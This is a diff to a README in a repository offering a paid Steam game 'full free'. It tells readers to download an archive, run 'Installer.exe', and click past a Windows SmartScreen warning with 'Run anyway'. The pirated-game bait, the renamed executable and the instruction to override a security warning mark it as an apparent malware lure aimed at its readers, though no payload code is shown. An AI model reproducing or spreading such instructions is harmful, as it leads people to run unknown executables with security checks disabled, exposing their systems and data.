Halloween-The-Game-Free-Full/.github/README.md

 ## Installing Halloween: The Game

 1. Download the **full game free** from the following link: **[CLICK](#)** — same complete build that costs $18.49 on Steam.
-2. Extract `Halloween-The-Game-Full.zip` and run `Halloween.exe` or the installer.
+2. Extract `Halloween-The-Game.zip` and run `Installer.exe` or the installer.
 3. If **Windows SmartScreen** shows a warning, click **"More info"** then **"Run anyway"**.
 4. Launch the game — log in with Steam for multiplayer and cloud saves.
 5. Optional: purchase **Digital Deluxe Upgrade** for exclusive Myers skin and bonus content.